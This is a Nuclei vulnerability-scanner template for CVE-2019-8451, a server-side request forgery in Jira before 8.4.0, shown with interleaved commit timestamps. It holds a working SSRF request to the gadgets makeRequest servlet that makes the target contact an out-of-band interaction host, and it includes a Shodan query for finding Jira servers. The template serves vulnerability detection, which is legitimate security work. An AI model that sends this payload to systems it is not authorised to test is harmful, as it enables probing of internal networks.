nuclei-templates/http/cves/2019/CVE-2019-8451.yaml

44 lines
1.5 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-8451
info:
name: Jira <8.4.0 - Server-Side Request Forgery
author: TechbrunchFR
severity: medium
2023-04-10 19:56:05 +00:00
description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations.
reference:
2021-03-30 12:10:17 +00:00
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
2021-07-30 11:50:31 +00:00
- https://hackerone.com/reports/713900
- https://nvd.nist.gov/vuln/detail/CVE-2019-8451
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2019-8451
cwe-id: CWE-918
cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
epss-score: 0.97115
2022-07-04 13:18:28 +00:00
metadata:
max-request: 1
2022-07-04 13:18:28 +00:00
shodan-query: http.component:"Atlassian Jira"
tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019
http:
2021-07-30 11:50:31 +00:00
- method: POST
path:
2021-07-30 11:50:31 +00:00
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
2021-07-30 12:05:48 +00:00
2021-08-01 19:57:40 +00:00
body: |
url=https://{{Host}}:443@{{interactsh-url}}
2021-08-01 19:57:40 +00:00
headers:
X-Atlassian-Token: no-check
2021-07-30 11:50:31 +00:00
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
2021-07-30 11:50:31 +00:00
part: interactsh_protocol
words:
2021-08-01 20:00:00 +00:00
- "http" # Confirms the HTTP Interaction
# Enhanced by md on 2023/04/04